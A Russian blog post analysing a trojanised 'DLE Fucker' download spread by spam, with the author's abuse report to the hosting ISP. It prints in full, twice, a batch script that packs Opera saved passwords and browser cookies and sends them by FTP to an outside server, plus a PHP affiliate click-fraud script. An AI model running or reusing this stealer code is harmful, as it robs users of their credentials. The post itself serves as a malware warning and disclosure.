Многие из вас получили письмо, в котором предлагалось скачать программу DLE Fucker , анонс был таков: "Предлагаем Вашему вниманию программу для обхода модерации и каптчи на сайтах DLE версии 8 и ниже ! " (мне письмо пришло от сайта warezbaza.com , с адреса  — этот сайт может быть непосредственно связан с кражей паролей), далее прилагалось 2 ссылки для скачивания с Депозита и Летитбита . Так как файл остался жив только на Депозите , я скачал его оттуда. Далее читайте о небольшом РАССЛЕДОВАНИИ , а также СОДЕРЖИМОМ и даже не думайте ЗАПУСКАТЬ! Распаковав, я посмотрел на Readme.txt , там предлагают запустить install.bat , открываем его блокнотом и видим:

cd %userprofile%
echo mcdemon>> 1.txt
echo mcdemon>> 1.txt
echo bin >> 1.txt
echo cd bycomb>> 1.txt
echo mkdir %USERNAME% >> 1.txt
echo cd %USERNAME% >> 1.txt
echo send pwd.rar>> 1.txt
echo bye>> 1.txt
C:\PROGRA~1\WinRAR\rar.exe a -r "%userprofile%\pwd.rar" "%userprofile%\Application Data\Opera\Opera\profile\wand.dat" "%userprofile%\Application Data\Opera\Opera\profile\cookies4.dat" "%userprofile%\Cookies"
ftp -s:1.txt ftp.nvkz.net
cd %userprofile%
del pwd.rar
del 1.txt

А видим, что после запуска этого батника мы лишаемся паролей, сохраненных в Опере (файл wand.dat ), а также кукисов (Оперы, ИЕ)... их отсылка идет на ФТП мошенника.

Далее смотрим дальше, в папке DLE Fucker — пусто, в BIN — драйвер Firebird ... а вот в Data лежит пустышка crack.dll и файл dle.dll , открыв его блокнотом можно увидеть, что это переименованный RAR архив, в котором всего 1 файл — script.php , распаковав его можно ознакомиться с таким содержимым:

<?php
$text=file_get_contents ("http://z320.takru.com/in.php?id=321991"); //ссылка на рекламу
$text=substr ($text,100);
$start=0;
$count=substr_count ($text,"<a href=\"http://web.tak.ru");
for ($i=1; $i<$count+1; $i++) {
$str_start=strpos ($text,"http://web.tak.ru", $start);
$str_end=strpos ($text,"\" class=\"takru\" target=_top onclick", $str_start);
$lenght=$str_end-$str_start;
$string=substr ($text, $str_start, $lenght);
$start=$start+170;
$string=htmlspecialchars ($string);
$links[$i]=$string;
}
$rand=mt_rand (1, count ($links));
print ($links[$rand]);
?>

Как видно, это скрипт накрутки партнерки... Далее, я не стал выяснять что и к чему в данной "программе", просто посмотрел по WHOIS кому принадлежит этот ФТП, выяснилось, что это НУЭС-Интернет Сервис Провайдер (© 2001—2007 ОАО "Сибирьтелеком". Структурное подразделение Новокузнецкий городской центр телекоммуникаций, Центр передачи данных)



Не долго думая я написал письмо на admin@nvkz.net , следующего содержания:

Здравствуйте!
Несколько дней назад в сети Интернет была проведена рассылка, предлагающая скачать ПО "DLE Fucker", скачав данное ПО и запустив install.bat Пользователь лишался своих паролей от веб-сайтов, которые отправлялись на ваш ФТП. Содержимое BAT Файла:

cd %userprofile%
echo mcdemon>> 1.txt
echo mcdemon>> 1.txt
echo bin >> 1.txt
echo cd bycomb>> 1.txt
echo mkdir %USERNAME% >> 1.txt
echo cd %USERNAME% >> 1.txt
echo send pwd.rar>> 1.txt
echo bye>> 1.txt
C:\PROGRA~1\WinRAR\rar.exe a -r "%userprofile%\pwd.rar" "%userprofile%\Application Data\Opera\Opera\profile\wand.dat" "%userprofile%\Application Data\Opera\Opera\profile\cookies4.dat" "%userprofile%\Cookies"
ftp -s:1.txt ftp.nvkz.net
cd %userprofile%
del pwd.rar
del 1.txt

В комментариях к программе значится такой автор: Aleksandar Kovac (ICQ: 399-298-734)
Посмотрите пожалуйста, кто обращался к данному файлу, и если это ваш абонент, то прошу принять меры к пресечению действий, преследуемых УК РФ.

Если вам будет нужен архив с данным ПО — я вам предоставлю.

Также я написал похожее письмо Депозиту , чтобы удалили файл. Вы спросите, зачем мне это надо? Отвечаю, я крайне отрицательно отношусь к краже персональных данных, как многие знаю, в середине апреля сам пострадал, от действий хакера-малолетки. Поэтому теперь я буду прилагать все возможные усилия по предотвращению подобных преступлений. Если придет ответ от администратора — я сразу сообщу!



VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
Добавить в закладки